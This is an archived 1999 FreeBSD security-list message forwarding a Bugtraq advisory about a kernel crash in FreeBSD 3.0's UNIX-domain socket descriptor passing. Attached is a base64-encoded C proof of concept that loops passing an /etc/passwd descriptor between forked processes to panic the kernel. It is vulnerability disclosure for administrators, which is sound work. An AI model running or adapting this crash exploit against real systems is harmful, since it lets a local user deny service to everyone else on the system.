Skip site navigation (1)Skip section navigation (2)
Date:      Thu, 06 May 1999 20:38:00 +0200
From:      sthaug@nethelp.no
To:        security@freebsd.org
Subject:   Forward: KKIS.05051999.003b
Message-ID:  <13867.926015880@verdi.nethelp.no>

next in thread | raw e-mail | index | archive | help
----Next_Part(Thu_May__6_20:37:58_1999)--
Content-Type: Text/Plain; charset=us-ascii

Just saw this on Bugtraq. Unable to reproduce it on 3.1-STABLE from
14. april.

Steinar Haug, Nethelp consulting, sthaug@nethelp.no

----Next_Part(Thu_May__6_20:37:58_1999)--
Content-Type: Message/rfc822

Return-Path: <owner-bugtraq@NETSPACE.ORG>
Delivered-To: sthaug@NETHELP.NO
Received: (qmail 13276 invoked from network); 6 May 1999 17:49:49 +0000 (GMT)
Received: from segate.sunet.se (192.36.125.6)
  by verdi.nethelp.no with SMTP; 6 May 1999 17:49:49 +0000 (GMT)
Received: from segate.sunet.se (192.36.125.16) by SEGATE.SUNET.SE (LSMTP for OpenVMS v1.1a) with SMTP id <10.F91D42BE@SEGATE.SUNET.SE>; Thu, 6 May 1999 18:51:54 +0100
Received: from NETSPACE.ORG by NETSPACE.ORG (LISTSERV-TCP/IP release 1.8d) with
          spool id 573208 for BUGTRAQ@NETSPACE.ORG; Thu, 6 May 1999 17:44:01
          +0000
Approved-By: aleph1@UNDERGROUND.ORG
Received: from nova.kki.krakow.pl (nova.kki.krakow.pl [195.116.9.2]) by
          netspace.org (8.8.7/8.8.7) with ESMTP id FAA21128 for
          <bugtraq@netspace.org>; Wed, 5 May 1999 05:22:29 -0400
Received: from nova.kki.krakow.pl (nova.kki.krakow.pl [195.116.9.2]) by
          nova.kki.krakow.pl (8.8.7/Ver.2c) with ESMTP id LAA18201 for
          <bugtraq@netspace.org>; Wed, 5 May 1999 11:26:21 +0200
X-Sender: lluzar@nova.kki.krakow.pl
MIME-Version: 1.0
Content-Type: MULTIPART/MIXED; BOUNDARY="1958937097-2116286281-925896381=:17696"
Message-ID:  <Pine.LNX.4.10.9905051119380.17696-200000@nova.kki.krakow.pl>
Date:         Wed, 5 May 1999 11:26:21 +0200
Reply-To:     Lukasz Luzar <lluzar@SECURITY.KKI.PL>
Sender:       Bugtraq List <BUGTRAQ@NETSPACE.ORG>
From:         Lukasz Luzar <lluzar@SECURITY.KKI.PL>
Subject:      KKIS.05051999.003b
To:           BUGTRAQ@NETSPACE.ORG

  This message is in MIME format.  The first part should be readable text,
  while the remaining parts are likely unreadable without MIME-aware tools.
  Send mail to mime@docserver.cac.washington.edu for more info.

--1958937097-2116286281-925896381=:17696
Content-Type: TEXT/PLAIN; charset=US-ASCII

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

                          ###  ###  ###  ###  ###
                          ### ###   ### ###   ###
                          ######    ######    ###
                          ### ###   ### ###   ###
                          ###  ###  ###  ###  ###

                              S E C U R I T Y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Contacts ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 KKI Security Team                              Cracow Commercial Internet
 http://www.security.kki.pl                     http://www.kki.pl
 mailto:security@security.kki.pl                mailto:biuro@kki.pl

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Informations ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 Report title        : Security problem with sockets in FreeBSD's
                       implementation of UNIX-domain protocol family.
 Problem found by    : Lukasz Luzar (lluzar@security.kki.pl)
 Report created by   : Robert Pajak (shadow@security.kki.pl)
                       Lukasz Luzar (lluzar@security.kki.pl)
 Raport published    : 5th May 1999
 Raport code         : KKIS.05051999.003.b
 Systems affected    : FreeBSD-3.0 and maybe 3.1,
 Archive             : http://www.security.kki.pl/advisories/
 Risk level          : high

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Description ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  As you know, "The UNIX-domain protocol family is a collection of protocols
 that provides local interprocess communication through the normal socket
 mechanism. It supports the SOCK_STREAM and SOCK_DGRAM soceket types and uses
 filesystem pathnames for addressing."
 The SOCK_STREAM sockets also supports the communication of UNIX file
 descriptors through the use of functions sendmsg() and recvmsg().
  While testing UNIX-domain protocols, we have found probable bug in
 FreeBSD's implementation of this mechanism.
  When we had run attached example on FreeBSD-3.0 as local user, system
 had crashed imediatelly with error "Supervisor read, page not present"
 in kernel mode.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Example ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 Look to attached example.

~~~~~~~~~~~~~~~~~~~~~~~~~~[ Copyright statement ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 Copyright (c) 1999 KKI Security Team, Poland
 All rights reserved.

 All questions please address to mailto:security@security.kki.pl
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


--1958937097-2116286281-925896381=:17696
Content-Type: TEXT/PLAIN; charset=US-ASCII; name="example.c"
Content-Transfer-Encoding: BASE64
Content-ID: <Pine.LNX.4.10.9905051126210.17696@nova.kki.krakow.pl>
Content-Description:
Content-Disposition: attachment; filename="example.c"

I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQoj
aW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPHN5cy91bi5oPg0K
I2luY2x1ZGUgPGZjbnRsLmg+DQojaW5jbHVkZSA8dW5pc3RkLmg+DQoNCiNk
ZWZpbmUgUEFUSCAiL3RtcC8xMjMiDQojZGVmaW5lIFBBVEhfVE1QICIvdG1w
LzEyMy50bXAiDQojZGVmaW5lIFNPTUVfRklMRSAiL2V0Yy9wYXNzd2QiDQoN
CnN0cnVjdCBteWNtc2doZHIgew0KCXN0cnVjdCBjbXNnaGRyIGhkcjsNCglp
bnQJZmQ7DQp9Ow0KDQpleHRlcm4gZXJybm87DQoNCnZvaWQgc2VydmVyKCk7
DQp2b2lkIGNsaWVudCgpOw0KDQp2b2lkIG1haW4oKQ0Kew0KCXN3aXRjaCAo
IGZvcmsoKSkgew0KCWNhc2UgLTE6DQoJCXByaW50ZiggImZvcmsgZXJyb3Ig
JWRcbiIsZXJybm8pOw0KCQlicmVhazsNCgljYXNlIDA6DQoJCWZvciAoOzsp
IGNsaWVudCgpOw0KCWRlZmF1bHQ6DQoJCXNlcnZlcigpOw0KCX0NCn0NCg0K
dm9pZCBzZXJ2ZXIoKQ0Kew0KCXN0cnVjdCBzb2NrYWRkcl91biBhZGRyOw0K
CXN0cnVjdCBtc2doZHIgbXltc2doZHI7DQoJc3RydWN0IG15Y21zZ2hkciBh
bmNkYnVmOw0KCWNoYXIgCWRhdGFbIDFdOw0KCWludAlzb2NrZmQsDQoJCWxl
biwNCgkJZmQ7DQoNCglpZiAoIHVubGluayggUEFUSCkgPT0gLTEpDQoJCXBy
aW50ZiggInVubGluayBlcnJvciAlZFxuIixlcnJubyk7DQoNCglpZiAoKCBz
b2NrZmQgPSBzb2NrZXQoIEFGX1VOSVgsU09DS19ER1JBTSwwKSkgPT0gLTEp
DQoJCXByaW50ZiggInNvY2tldCBlcnJvciAlZFxuIixlcnJubyk7DQoNCglz
dHJjcHkoIGFkZHIuc3VuX3BhdGgsUEFUSCk7DQoJYWRkci5zdW5fbGVuID0g
c2l6ZW9mKCBhZGRyLnN1bl9sZW4pICsgc2l6ZW9mKCBhZGRyLnN1bl9mYW1p
bHkpIA0KCQkJKyBzdHJsZW4oIGFkZHIuc3VuX3BhdGgpOyANCglhZGRyLnN1
bl9mYW1pbHkgPSBBRl9VTklYOw0KDQoJaWYgKCBiaW5kKCBzb2NrZmQsKHN0
cnVjdCBzb2NrYWRkciAqKSAmYWRkcixhZGRyLnN1bl9sZW4pID09IC0xKQ0K
CQlwcmludGYoICJiaW5kIGVycm9yICVkXG4iLGVycm5vKTsNCg0KCWZvciAo
OzspIHsNCg0KCQlpZiAoKCBmZCA9IG9wZW4oIFNPTUVfRklMRSxPX1JET05M
WSkpID09IC0xKSANCgkJCXByaW50ZiggIm9wZW4gZmlsZSBlcnJvciAlZFxu
IixlcnJubyk7DQoNCgkJbGVuID0gc2l6ZW9mKCBhZGRyLnN1bl9wYXRoKTsN
Cg0KCQlpZiAoIHJlY3Zmcm9tKCBzb2NrZmQsJmRhdGEsc2l6ZW9mKCBkYXRh
KSwwLA0KCQkJKHN0cnVjdCBzb2NrYWRkciAqKSAmYWRkciwmbGVuKSA9PSAt
MSkgDQoJCQlwcmludGYoICJyZWN2ZnJvbSBlcnJvciAlZFxuIixlcnJubyk7
DQoNCgkJYW5jZGJ1Zi5oZHIuY21zZ19sZW4gPSBzaXplb2YoIGFuY2RidWYp
Ow0KCQlhbmNkYnVmLmhkci5jbXNnX2xldmVsID0gU09MX1NPQ0tFVDsNCgkJ
YW5jZGJ1Zi5oZHIuY21zZ190eXBlID0gU0NNX1JJR0hUUzsNCgkJYW5jZGJ1
Zi5mZCA9IGZkOw0KDQoJCW15bXNnaGRyLm1zZ19uYW1lID0gKGNhZGRyX3Qp
ICZhZGRyOw0KCQlteW1zZ2hkci5tc2dfbmFtZWxlbiA9IGxlbjsNCgkJbXlt
c2doZHIubXNnX2lvdiA9IE5VTEw7DQoJCW15bXNnaGRyLm1zZ19pb3ZsZW4g
PSAwOw0KCQlteW1zZ2hkci5tc2dfY29udHJvbCA9IChjYWRkcl90KSAmYW5j
ZGJ1ZjsNCgkJbXltc2doZHIubXNnX2NvbnRyb2xsZW4gPSBhbmNkYnVmLmhk
ci5jbXNnX2xlbjsNCgkJbXltc2doZHIubXNnX2ZsYWdzID0gMDsNCgkJDQoJ
CWlmICggc2VuZG1zZyggc29ja2ZkLCZteW1zZ2hkciwwKSA9PSAtMSkgDQoJ
CQlwcmludGYoICJzZW5kbXNnIGVycm9yICVkXG4iLGVycm5vKTsNCg0KCQlj
bG9zZSggZmQpOw0KCX0NCn0NCg0Kdm9pZCBjbGllbnQoKQ0Kew0KCXN0cnVj
dCBzb2NrYWRkcl91bglhZGRyX3MsDQoJCQkJYWRkcl9jOw0KCXN0cnVjdCBt
eWNtc2doZHIJYW5jZGJ1ZjsNCglzdHJ1Y3QgbXNnaGRyCQlteW1zZ2hkcjsN
CgljaGFyIAlkYXRhWyAxXTsNCglpbnQJc29ja2ZkLA0KCQlsZW4sDQoJCWZk
Ow0KDQoJaWYgKCggc29ja2ZkID0gc29ja2V0KCBBRl9VTklYLFNPQ0tfREdS
QU0sMCkpID09IC0xKSANCgkJcHJpbnRmKCAic29ja2V0IGVycm9yICVkXG4i
LGVycm5vKTsNCg0KCWlmICggdW5saW5rKCBQQVRIX1RNUCkgPT0gLTEpDQoJ
CXByaW50ZiggInVubGluayBlcnJvciAlZFxuIixlcnJubyk7DQoNCglzdHJj
cHkoIGFkZHJfYy5zdW5fcGF0aCxQQVRIX1RNUCk7DQoJYWRkcl9jLnN1bl9s
ZW4gPSBzaXplb2YoIGFkZHJfYy5zdW5fbGVuKSArIHNpemVvZihhZGRyX2Mu
c3VuX2ZhbWlseSkgDQoJCQkgICsgc3RybGVuKCBhZGRyX2Muc3VuX3BhdGgp
Ow0KCWFkZHJfYy5zdW5fZmFtaWx5ID0gQUZfVU5JWDsNCg0KCXN0cmNweSgg
YWRkcl9zLnN1bl9wYXRoLFBBVEgpOw0KCWFkZHJfcy5zdW5fbGVuID0gc2l6
ZW9mKCBhZGRyX3Muc3VuX2xlbikgKyBzaXplb2YoYWRkcl9zLnN1bl9mYW1p
bHkpDQoJCSAgICAgICAgICAgKyBzdHJsZW4oIGFkZHJfcy5zdW5fcGF0aCk7
DQoJYWRkcl9zLnN1bl9mYW1pbHkgPSBBRl9VTklYOw0KDQoJaWYgKCBiaW5k
KCBzb2NrZmQsKHN0cnVjdCBzb2NrYWRkciopICZhZGRyX2MsYWRkcl9jLnN1
bl9sZW4pID09IC0xKQ0KCQlwcmludGYoICJiaW5kIGVycm9yICVkXG4iLGVy
cm5vKTsNCg0KCWlmICggc2VuZHRvKCBzb2NrZmQsJmRhdGEsc2l6ZW9mKCBk
YXRhKSwwLChzdHJ1Y3Qgc29ja2FkZHIgKikgJmFkZHJfcywNCgkJYWRkcl9z
LnN1bl9sZW4pID09IC0xKSANCgkJcHJpbnRmKCAic2VuZHRvIGVycm9yICVk
XG4iLGVycm5vKTsNCg0KCWxlbiA9IGFkZHJfcy5zdW5fbGVuOw0KDQoJYW5j
ZGJ1Zi5oZHIuY21zZ19sZW4gPSBzaXplb2YoIGFuY2RidWYpOw0KCWFuY2Ri
dWYuaGRyLmNtc2dfbGV2ZWwgPSBTT0xfU09DS0VUOw0KCWFuY2RidWYuaGRy
LmNtc2dfdHlwZSA9IFNDTV9SSUdIVFM7DQoNCglteW1zZ2hkci5tc2dfbmFt
ZSA9IE5VTEw7DQoJbXltc2doZHIubXNnX25hbWVsZW4gPSAwOw0KCW15bXNn
aGRyLm1zZ19pb3YgPSBOVUxMOw0KCW15bXNnaGRyLm1zZ19pb3ZsZW4gPSAw
Ow0KCW15bXNnaGRyLm1zZ19jb250cm9sID0gKGNhZGRyX3QpICZhbmNkYnVm
Ow0KCW15bXNnaGRyLm1zZ19jb250cm9sbGVuID0gYW5jZGJ1Zi5oZHIuY21z
Z19sZW47DQoJbXltc2doZHIubXNnX2ZsYWdzID0gMDsNCg0KCWlmICggcmVj
dm1zZyggc29ja2ZkLCZteW1zZ2hkciwwKSA9PSAtMSkNCgkJcHJpbnRmKCAi
cmVjdm1zZyBlcnJvciAlZFxuIixlcnJubyk7DQoNCglmZCA9IGFuY2RidWYu
ZmQ7DQoJDQoJY2xvc2UoZmQpOw0KCWNsb3NlKCBzb2NrZmQpOw0KfQ0K
--1958937097-2116286281-925896381=:17696--

----Next_Part(Thu_May__6_20:37:58_1999)----


To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message




Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?13867.926015880>